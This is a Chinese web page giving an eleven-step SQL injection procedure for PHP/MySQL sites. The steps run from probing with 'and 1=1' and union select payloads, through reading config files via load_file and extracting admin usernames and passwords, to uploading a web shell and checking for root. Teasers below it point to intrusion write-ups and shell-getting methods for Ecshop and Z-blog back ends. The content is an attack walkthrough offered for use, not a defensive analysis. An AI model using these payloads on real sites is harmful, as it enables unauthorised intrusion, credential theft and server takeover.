php注入基本步骤小结

所属分类: 网络安全 / 脚本攻防 阅读数: 126
收藏 0 赞 0 分享
php注入十点基本步骤

1、判断是否存在注入,加'、and 1=1、and 1=2

2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询

3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于10

4、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。

(可在分别用user()、database()、version()进行替换报出的数字进而查看信息)

5、判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0/* 如果结果返回错误,那我们只能猜解管理员帐号和密码了。

6、如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。

7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,说明存在这个表。

8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按报出的数字进行替换

9、同理再猜解password字段,猜解成功再找后台登录。

10、登录后台,上传shell。

11、检测是不是root权限 and/**/ord(mid(user(),1,1))=114/*
更多精彩内容其他人还在看

后台登入框注入拿shell步骤

朋友突然丢来一个站,说帮他日日站,前台都没有注入点,上传点也没有,说就后天有注入点,可是他说他手工功力不够,让俺来试试,于是,我就放下手中的活,打开了网站。
收藏 0 赞 0 分享

入侵中国红客联盟过程分析

因为上次看到小组里的khjl入侵了这个站点,于是,我也有了这个念头,打开这个站点,首页是静态的页面,一般这种站点都是一些有名的源码,php168cms、dedecms等等,因为这些源码的技术相对比较成熟,漏洞相对来讲少点。
收藏 0 赞 0 分享

mysql的user.MYD数据库连接密码hash值无法用winhex打开等

提权时,当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时
收藏 0 赞 0 分享

反常规and 1=1的or 1=2注入技巧

春节呆在家里上网,我表哥突然找我说要一个DJ网站的VIP会员,说搞定后请我吃KFC,于是就答应了。
收藏 0 赞 0 分享

利用星外虚拟机的入侵 经验分析

近日帮朋友搞一个小站,本来以为很快就能搞定 结果花了不少时间。不得不说能力有限呀。
收藏 0 赞 0 分享

webshell提权经验分享

可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
收藏 0 赞 0 分享

MSSQL中两种特别的执行命令的方法

现在很多计算机可以执行命令的方法都被人封得抓狂,就算有幸可以执行,也有可能CMD被改了权限,所以我推荐的办法是有能力的同学自己开发DLL,然后把DLL写入到对方计算机中,再注册为存储过程.
收藏 0 赞 0 分享

Ecshop后台拿shell方法总结

Ecshop后台拿shell方法总结,正在使用ecshop建站的朋友一定要注意升级。
收藏 0 赞 0 分享

Z-blog后台拿SHELL方法总结

Z-blog后台拿SHELL方法很多关键看你有没有本事进后台,逍遥复仇整理三种常用简单后台拿SHELL的方法供大家参考
收藏 0 赞 0 分享

php注入基本步骤小结

php注入基本步骤小结,我们在编写代码的时候一定要注意注入点。
收藏 0 赞 0 分享
查看更多